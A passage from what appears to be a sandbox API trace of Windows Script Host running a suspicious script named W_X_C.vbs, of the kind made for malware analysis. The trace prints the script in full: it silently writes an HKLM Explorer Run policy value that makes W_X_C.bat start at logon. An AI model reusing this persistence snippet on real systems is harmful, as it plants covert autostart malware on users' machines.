lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2fe990, lpData=0x2fe994, lpcbData=0x2fe98c*=0x400 | out: lpType=0x2fe990*=0x0, lpData=0x2fe994*=0x2, lpcbData=0x2fe98c*=0x400) returned 0x2 [0173.856] RegQueryValueExW (in: hKey=0xa0, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2fe990, lpData=0x2fe994, lpcbData=0x2fe98c*=0x400 | out: lpType=0x2fe990*=0x0, lpData=0x2fe994*=0x2, lpcbData=0x2fe98c*=0x400) returned 0x2 [0173.856] RegQueryValueExW (in: hKey=0xa4, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2fe990, lpData=0x2fe994, lpcbData=0x2fe98c*=0x400 | out: lpType=0x2fe990*=0x0, lpData=0x2fe994*=0x2, lpcbData=0x2fe98c*=0x400) returned 0x2 [0173.856] RegCloseKey (hKey=0xa4) returned 0x0 [0173.856] RegCloseKey (hKey=0xa0) returned 0x0 [0173.856] GetACP () returned 0x4e4 [0173.856] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a80000 [0173.856] GetProcAddress (hModule=0x75a80000, lpProcName="HeapSetInformation") returned 0x75a95609 [0173.857] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.857] FreeLibrary (hLibModule=0x75a80000) returned 1 [0173.857] ??2@YAPAXI@Z () returned 0x4e1348 [0173.857] CoRegisterMessageFilter (in: lpMessageFilter=0x4e1348, lplpMessageFilter=0x4e1350 | out: lplpMessageFilter=0x4e1350*=0x0) returned 0x0 [0173.857] IUnknown:AddRef (This=0x4e1348) returned 0x2 [0173.857] GetModuleFileNameW (in: hModule=0xfc0000, lpFilename=0x2ff874, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\WScript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")) returned 0x1f [0173.857] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", lpdwHandle=0x2ff288 | out: lpdwHandle=0x2ff288) returned 0x704 [0173.858] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x2feb70 | out: lpData=0x2feb70) returned 1 [0173.859] VerQueryValueW (in: pBlock=0x2feb70, lpSubBlock="\\", lplpBuffer=0x2ff284, puLen=0x2ff280 | out: lplpBuffer=0x2ff284*=0x2feb98, puLen=0x2ff280) returned 1 [0173.859] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff298 | out: phkResult=0x2ff298*=0xa0) returned 0x0 [0173.859] RegQueryValueExW (in: hKey=0xa0, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2fe664, lpData=0x2fe668, lpcbData=0x2fe660*=0x400 | out: lpType=0x2fe664*=0x0, lpData=0x2fe668*=0xcd, lpcbData=0x2fe660*=0x400) returned 0x2 [0173.859] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff294 | out: phkResult=0x2ff294*=0xa4) returned 0x0 [0173.860] RegQueryValueExW (in: hKey=0xa4, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2ff25c, lpData=0x2ff290, lpcbData=0x2ff264*=0x4 | out: lpType=0x2ff25c*=0x0, lpData=0x2ff290*=0x10, lpcbData=0x2ff264*=0x4) returned 0x2 [0173.860] RegQueryValueExW (in: hKey=0xa4, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2fe664, lpData=0x2fe668, lpcbData=0x2fe660*=0x400 | out: lpType=0x2fe664*=0x0, lpData=0x2fe668*=0xcd, lpcbData=0x2fe660*=0x400) returned 0x2 [0173.860] RegQueryValueExW (in: hKey=0xa0, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2ff25c, lpData=0x2ff290, lpcbData=0x2ff264*=0x4 | out: lpType=0x2ff25c*=0x0, lpData=0x2ff290*=0x10, lpcbData=0x2ff264*=0x4) returned 0x2 [0173.860] RegQueryValueExW (in: hKey=0xa0, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2fe664, lpData=0x2fe668, lpcbData=0x2fe660*=0x400 | out: lpType=0x2fe664*=0x1, lpData="1", lpcbData=0x2fe660*=0x4) returned 0x0 [0173.860] lstrlenW (lpString="1") returned 1 [0173.860] lstrlenW (lpString="0") returned 1 [0173.860] lstrlenW (lpString="1") returned 1 [0173.860] lstrlenW (lpString="no") returned 2 [0173.860] lstrlenW (lpString="1") returned 1 [0173.860] lstrlenW (lpString="false") returned 5 [0173.860] RegCloseKey (hKey=0xa4) returned 0x0 [0173.861] RegCloseKey (hKey=0xa0) returned 0x0 [0173.861] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2ff2a4, lpdwDisposition=0x0 | out: phkResult=0x2ff2a4*=0xa0, lpdwDisposition=0x0) returned 0x0 [0173.861] RegQueryValueExW (in: hKey=0xa0, lpValueName="Timeout", lpReserved=0x0, lpType=0x2ff268, lpData=0x2ff298, lpcbData=0x2ff270*=0x4 | out: lpType=0x2ff268*=0x0, lpData=0x2ff298*=0xe0, lpcbData=0x2ff270*=0x4) returned 0x2 [0173.861] RegQueryValueExW (in: hKey=0xa0, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2fe670, lpData=0x2fe674, lpcbData=0x2fe66c*=0x400 | out: lpType=0x2fe670*=0x1, lpData="1", lpcbData=0x2fe66c*=0x4) returned 0x0 [0173.861] lstrlenW (lpString="1") returned 1 [0173.862] lstrlenW (lpString="0") returned 1 [0173.862] lstrlenW (lpString="1") returned 1 [0173.862] lstrlenW (lpString="no") returned 2 [0173.862] lstrlenW (lpString="1") returned 1 [0173.862] lstrlenW (lpString="false") returned 5 [0173.862] RegCloseKey (hKey=0xa0) returned 0x0 [0173.871] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2ff2a4, lpdwDisposition=0x0 | out: phkResult=0x2ff2a4*=0xa0, lpdwDisposition=0x0) returned 0x0 [0173.871] RegQueryValueExW (in: hKey=0xa0, lpValueName="Timeout", lpReserved=0x0, lpType=0x2ff268, lpData=0x2ff298, lpcbData=0x2ff270*=0x4 | out: lpType=0x2ff268*=0x0, lpData=0x2ff298*=0xe0, lpcbData=0x2ff270*=0x4) returned 0x2 [0173.871] RegQueryValueExW (in: hKey=0xa0, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2fe670, lpData=0x2fe674, lpcbData=0x2fe66c*=0x400 | out: lpType=0x2fe670*=0x0, lpData=0x2fe674*=0x31, lpcbData=0x2fe66c*=0x400) returned 0x2 [0173.871] RegCloseKey (hKey=0xa0) returned 0x0 [0173.871] lstrlenW (lpString="C:\\Windows\\W_X_C.vbs") returned 20 [0173.871] lstrlenW (lpString="vbs") returned 3 [0173.872] lstrlenW (lpString="WSH") returned 3 [0173.872] ??2@YAPAXI@Z () returned 0x4e1360 [0173.872] memcpy (in: _Dst=0x2fee24, _Src=0x2ff874, _Size=0x26 | out: _Dst=0x2fee24) returned 0x2fee24 [0173.872] LoadStringW (in: hInstance=0xfc0000, uID=0x9c5, lpBuffer=0x2fd5f4, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0173.873] LoadTypeLib (in: szFile="C:\\Windows\\SysWOW64\\WScript.exe", pptlib=0x2fee1c*=0x0 | out: pptlib=0x2fee1c*=0x38fd18) returned 0x0 [0173.886] ITypeLib:GetTypeInfoOfGuid (in: This=0x38fd18, GUID=0xfc1acc*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x2fee04 | out: ppTInfo=0x2fee04*=0x390e4c) returned 0x0 [0173.891] ITypeInfo:GetRefTypeOfImplType (in: This=0x390e4c, index=0xffffffff, pRefType=0x2fedf8 | out: pRefType=0x2fedf8*=0xfffffffe) returned 0x0 [0173.891] ITypeInfo:GetRefTypeInfo (in: This=0x390e4c, hreftype=0xfffffffe, ppTInfo=0xfd9060 | out: ppTInfo=0xfd9060*=0x390e78) returned 0x0 [0173.891] IUnknown:Release (This=0x390e4c) returned 0x1 [0173.891] ??2@YAPAXI@Z () returned 0x4e13b0 [0173.891] ??2@YAPAXI@Z () returned 0x4e1408 [0173.891] ??2@YAPAXI@Z () returned 0x4e1440 [0173.892] ITypeLib:GetTypeInfoOfGuid (in: This=0x38fd18, GUID=0xfc3c7c*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x2fedf4 | out: ppTInfo=0x2fedf4*=0x390ea4) returned 0x0 [0173.892] ITypeInfo:GetRefTypeOfImplType (in: This=0x390ea4, index=0xffffffff, pRefType=0x2fede8 | out: pRefType=0x2fede8*=0xfffffffe) returned 0x0 [0173.892] ITypeInfo:GetRefTypeInfo (in: This=0x390ea4, hreftype=0xfffffffe, ppTInfo=0xfd90a0 | out: ppTInfo=0xfd90a0*=0x390ed0) returned 0x0 [0173.892] IUnknown:Release (This=0x390ea4) returned 0x1 [0173.892] ITypeLib:GetTypeInfoOfGuid (in: This=0x38fd18, GUID=0xfc3c8c*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x2fedf4 | out: ppTInfo=0x2fedf4*=0x390efc) returned 0x0 [0173.892] ITypeInfo:GetRefTypeOfImplType (in: This=0x390efc, index=0xffffffff, pRefType=0x2fede8 | out: pRefType=0x2fede8*=0xfffffffe) returned 0x0 [0173.892] ITypeInfo:GetRefTypeInfo (in: This=0x390efc, hreftype=0xfffffffe, ppTInfo=0xfd90c0 | out: ppTInfo=0xfd90c0*=0x390f28) returned 0x0 [0173.892] IUnknown:Release (This=0x390efc) returned 0x1 [0173.892] ITypeLib:GetTypeInfoOfGuid (in: This=0x38fd18, GUID=0xfc1cac*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x2fedf4 | out: ppTInfo=0x2fedf4*=0x390f54) returned 0x0 [0173.892] ITypeInfo:GetRefTypeOfImplType (in: This=0x390f54, index=0xffffffff, pRefType=0x2fede8 | out: pRefType=0x2fede8*=0xfffffffe) returned 0x0 [0173.892] ITypeInfo:GetRefTypeInfo (in: This=0x390f54, hreftype=0xfffffffe, ppTInfo=0xfd9080 | out: ppTInfo=0xfd9080*=0x390f80) returned 0x0 [0173.892] IUnknown:Release (This=0x390f54) returned 0x1 [0173.893] IUnknown:Release (This=0x38fd18) returned 0x4 [0173.893] ??2@YAPAXI@Z () returned 0x4e2598 [0173.893] GetCurrentThreadId () returned 0x600 [0173.893] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf0 [0173.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xfc2f25, lpParameter=0x4e2598, dwCreationFlags=0x0, lpThreadId=0x4e25ac | out: lpThreadId=0x4e25ac*=0xd4c) returned 0xf8 [0174.199] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ff01c*=0xf0, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0174.572] CloseHandle (hObject=0xf0) returned 1 [0174.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\W_X_C.vbs", nBufferLength=0x104, lpBuffer=0x2ff07c, lpFilePart=0x2ff068 | out: lpBuffer="C:\\Windows\\W_X_C.vbs", lpFilePart=0x2ff068*="W_X_C.vbs") returned 0x14 [0174.573] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x2fe610 | out: phkResult=0x2fe610*=0x10a) returned 0x0 [0174.574] RegQueryValueExW (in: hKey=0x10a, lpValueName=0x0, lpReserved=0x0, lpType=0x2fe5d8, lpData=0x2fe614, lpcbData=0x2fe5dc*=0x800 | out: lpType=0x2fe5d8*=0x1, lpData="VBSFile", lpcbData=0x2fe5dc*=0x10) returned 0x0 [0174.574] RegCloseKey (hKey=0x10a) returned 0x0 [0174.575] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2fe610 | out: phkResult=0x2fe610*=0x10a) returned 0x0 [0174.575] RegQueryValueExW (in: hKey=0x10a, lpValueName=0x0, lpReserved=0x0, lpType=0x2fe5d8, lpData=0x2fee4c, lpcbData=0x2fe5dc*=0x200 | out: lpType=0x2fe5d8*=0x1, lpData="VBScript", lpcbData=0x2fe5dc*=0x12) returned 0x0 [0174.575] RegCloseKey (hKey=0x10a) returned 0x0 [0174.576] ??2@YAPAXI@Z () returned 0x4e2868 [0174.576] GetProcessHeap () returned 0x370000 [0174.576] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2000) returned 0x3955e8 [0174.576] CLSIDFromString (in: lpsz="VBScript", pclsid=0x2fee1c | out: pclsid=0x2fee1c*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0174.578] CoCreateInstance (in: rclsid=0x2fee1c*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xfc1aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fee18 | out: ppv=0x2fee18*=0x4e2a18) returned 0x0 [0174.614] malloc (_Size=0x80) returned 0x4e2950 [0174.615] __dllonexit () returned 0x713b7164 [0174.615] __dllonexit () returned 0x713b717e [0174.616] __dllonexit () returned 0x713b7198 [0174.616] GetUserDefaultLCID () returned 0x409 [0174.616] GetVersion () returned 0x1db10106 [0174.617] DllGetClassObject (in: rclsid=0x398e24*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x76caee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fe104 | out: ppv=0x2fe104*=0x4e29d8) returned 0x0 [0174.617] ??2@YAPAXI@Z () returned 0x4e29d8 [0174.617] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x4e29d8, pUnkOuter=0x0, riid=0x2feab0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2fe0f0 | out: ppvObject=0x2fe0f0*=0x4e2a18) returned 0x0 [0174.618] ??2@YAPAXI@Z () returned 0x4e2a18 [0174.618] GetUserDefaultLCID () returned 0x409 [0174.618] GetACP () returned 0x4e4 [0174.618] VBScriptEngine5:IUnknown:AddRef (This=0x4e2a18) returned 0x2 [0174.619] VBScriptEngine5:IUnknown:Release (This=0x4e2a18) returned 0x1 [0174.619] VBScriptEngine5:IUnknown:Release (This=0x4e29d8) returned 0x0 [0174.619] ??3@YAXPAX@Z () returned 0x1 [0174.619] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x4e2a18, riid=0xfc1aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2fede0 | out: ppvObject=0x2fede0*=0x4e2a18) returned 0x0 [0174.619] VBScriptEngine5:IUnknown:Release (This=0x4e2a18) returned 0x1 [0174.619] GetCurrentThreadId () returned 0x600 [0174.620] ??2@YAPAXI@Z () returned 0x4e2c20 [0174.620] GetCurrentThreadId () returned 0x600 [0174.620] ??2@YAPAXI@Z () returned 0x4e29d8 [0174.620] ??2@YAPAXI@Z () returned 0x4e2ce0 [0174.620] ??2@YAPAXI@Z () returned 0x4e2d08 [0174.620] ??2@YAPAXI@Z () returned 0x4e2d88 [0174.620] GetCurrentThreadId () returned 0x600 [0174.620] ??2@YAPAXI@Z () returned 0x4e2db0 [0174.621] GetUserDefaultLCID () returned 0x409 [0174.621] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0174.622] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2fedd0, cchData=6 | out: lpLCData="1252") returned 5 [0174.622] IsValidCodePage (CodePage=0x4e4) returned 1 [0174.622] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76c60000 [0174.623] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstance") returned 0x76ca9d0b [0174.623] CoCreateInstance (in: rclsid=0x713ab234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x713ab244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x4e2bf4 | out: ppv=0x4e2bf4*=0x3895c8) returned 0x0 [0174.623] IUnknown:AddRef (This=0x3895c8) returned 0x2 [0174.624] GetCurrentProcessId () returned 0xd04 [0174.624] GetCurrentThreadId () returned 0x600 [0174.624] GetTickCount () returned 0x1d1389b [0174.624] ISystemDebugEventFire:BeginSession (This=0x3895c8, guidSourceID=0x713ab308, strSessionName="VBScript:00003332:00001536:30488731") returned 0x0 [0174.624] GetCurrentThreadId () returned 0x600 [0174.625] ??2@YAPAXI@Z () returned 0x4e2e00 [0174.625] ??2@YAPAXI@Z () returned 0x4e2e30 [0174.625] malloc (_Size=0x40) returned 0x4e2ec0 [0174.625] malloc (_Size=0x104) returned 0x4e2f08 [0174.625] memcpy (in: _Dst=0x4e2f3c, _Src=0x394fc4, _Size=0x10 | out: _Dst=0x4e2f3c) returned 0x4e2f3c [0174.626] GetCurrentThreadId () returned 0x600 [0174.626] ??2@YAPAXI@Z () returned 0x4e3018 [0174.626] memcpy (in: _Dst=0x4e2f7c, _Src=0x38dad4, _Size=0x8 | out: _Dst=0x4e2f7c) returned 0x4e2f7c [0174.626] CreateFileW (lpFileName="C:\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x124 [0174.865] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc5 [0174.865] CreateFileMappingA (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc5, lpName=0x0) returned 0x128 [0174.865] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x190000 [0174.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x190000, cbMultiByte=197, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 197 [0174.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="on error resume next\r\ndim t\r\nset t = CreateObject(\"WScript.Shell\")\r\nt.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"\r\n", cbMultiByte=197, lpWideCharStr=0x399c74, cchWideChar=197 | out: lpWideCharStr="on error resume next\r\ndim t\r\nset t = CreateObject(\"WScript.Shell\")\r\nt.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"\r\n") returned 197 [0174.866] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0174.866] CloseHandle (hObject=0x128) returned 1 [0174.866] CloseHandle (hObject=0x124) returned 1 [0174.867] GetSystemDirectoryA (in: lpBuffer=0x2fef9b, uSize=0x0 | out: lpBuffer="") returned 0x14 [0174.867] ??2@YAPAXI@Z () returned 0x4e3048 [0174.867] GetSystemDirectoryA (in: lpBuffer=0x4e3048, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0174.867] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x76f40000 [0174.868] ??3@YAXPAX@Z () returned 0x1 [0174.868] GetProcAddress (hModule=0x76f40000, lpProcName="SaferIdentifyLevel") returned 0x76f62102 [0174.868] GetProcAddress (hModule=0x76f40000, lpProcName="SaferComputeTokenFromLevel") returned 0x76f63352 [0174.868] GetProcAddress (hModule=0x76f40000, lpProcName="SaferCloseLevel") returned 0x76f63825 [0174.868] IdentifyCodeAuthzLevelW () returned 0x1 [0175.343] malloc (_Size=0x80) returned 0x4e3598 [0175.343] GetVersionExA (in: lpVersionInformation=0x2fe624*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77a8e026, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2fe624*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0175.344] GetUserDefaultLCID () returned 0x409 [0175.344] IsFileSupportedName () returned 0x1 [0175.344] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0175.570] GetSignedDataMsg () returned 0x0 [0175.570] GetCurrentProcess () returned 0xffffffff [0175.570] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2feb50, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2feb50*=0x154) returned 1 [0175.570] GetFileSize (in: hFile=0x154, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc5 [0175.570] ??2@YAPAXI@Z () returned 0x4ee0a8 [0175.570] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.570] ReadFile (in: hFile=0x154, lpBuffer=0x4ee0a8, nNumberOfBytesToRead=0xc5, lpNumberOfBytesRead=0x2feb24, lpOverlapped=0x0 | out: lpBuffer=0x4ee0a8*, lpNumberOfBytesRead=0x2feb24*=0xc5, lpOverlapped=0x0) returned 1 [0175.570] CoInitialize (pvReserved=0x0) returned 0x1 [0175.570] CoCreateInstance (in: rclsid=0x72c61e54*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x72c61d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x2feafc | out: ppv=0x2feafc*=0x4ee4d8) returned 0x0 [0175.585] malloc (_Size=0x80) returned 0x4ee178 [0175.585] __dllonexit () returned 0x72c31815 [0175.586] __dllonexit () returned 0x72c3182f [0175.586] GetVersionExA (in: lpVersionInformation=0x2fd688*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2fd678, dwMinorVersion=0x2, dwBuildNumber=0x300000, dwPlatformId=0x72c34268, szCSDVersion="¨Ö/") | out: lpVersionInformation=0x2fd688*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0175.586] GetProcessWindowStation () returned 0x4c [0175.586] GetUserObjectInformationA (in: hObj=0x4c, nIndex=1, pvInfo=0x2fd678, nLength=0xc, lpnLengthNeeded=0x2fd684 | out: pvInfo=0x2fd678, lpnLengthNeeded=0x2fd684) returned 1 [0175.586] ??2@YAPAXI@Z () returned 0x4ee200 [0175.587] ??2@YAPAXI@Z () returned 0x4e29f8 [0175.587] ??2@YAPAXI@Z () returned 0x4ee238 [0175.587] ??2@YAPAXI@Z () returned 0x4ee268 [0175.587] ??2@YAPAXI@Z () returned 0x4ee298 [0175.587] ??2@YAPAXI@Z () returned 0x4ee2c8 [0175.587] ??2@YAPAXI@Z () returned 0x4ee2f8 [0175.587] ??2@YAPAXI@Z () returned 0x4ee328 [0175.587] ??2@YAPAXI@Z () returned 0x4ee358 [0175.587] ??2@YAPAXI@Z () returned 0x4ee388 [0175.587] ??2@YAPAXI@Z () returned 0x4ee3b8 [0175.587] ??3@YAXPAX@Z () returned 0x1 [0175.587] ??2@YAPAXI@Z () returned 0x4ee3e0 [0175.588] ??2@YAPAXI@Z () returned 0x4ee410 [0175.588] DllGetClassObject (in: rclsid=0x398e58*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x76caee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fddf4 | out: ppv=0x2fddf4*=0x4e29f8) returned 0x0 [0175.588] ??2@YAPAXI@Z () returned 0x4e29f8 [0175.589] IClassFactory:CreateInstance (in: This=0x4e29f8, pUnkOuter=0x0, riid=0x2fe7a0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2fdde0 | out: ppvObject=0x2fdde0*=0x4ee4d8) returned 0x0 [0175.589] ??2@YAPAXI@Z () returned 0x4ee440 [0175.589] GetSystemInfo (in: lpSystemInfo=0x2fdd20 | out: lpSystemInfo=0x2fdd20*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06)) [0175.589] VirtualQuery (in: lpAddress=0x2fdd60, lpBuffer=0x2fdd44, dwLength=0x1c | out: lpBuffer=0x2fdd44*(BaseAddress=0x2fd000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.589] ??2@YAPAXI@Z () returned 0x4ee468 [0175.589] ??2@YAPAXI@Z () returned 0x4ee478 [0175.589] ??2@YAPAXI@Z () returned 0x4ee4b0 [0175.590] ??2@YAPAXI@Z () returned 0x4ee4c8 [0175.590] ??2@YAPAXI@Z () returned 0x4ee520 [0175.590] IUnknown:AddRef (This=0x4ee4d8) returned 0x2 [0175.591] IUnknown:Release (This=0x4ee4d8) returned 0x1 [0175.591] IUnknown:Release (This=0x4e29f8) returned 0x0 [0175.591] ??3@YAXPAX@Z () returned 0x1 [0175.591] IUnknown:QueryInterface (in: This=0x4ee4d8, riid=0x72c61d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2feacc | out: ppvObject=0x2feacc*=0x4ee4d8) returned 0x0 [0175.591] IUnknown:Release (This=0x4ee4d8) returned 0x1 [0175.591] 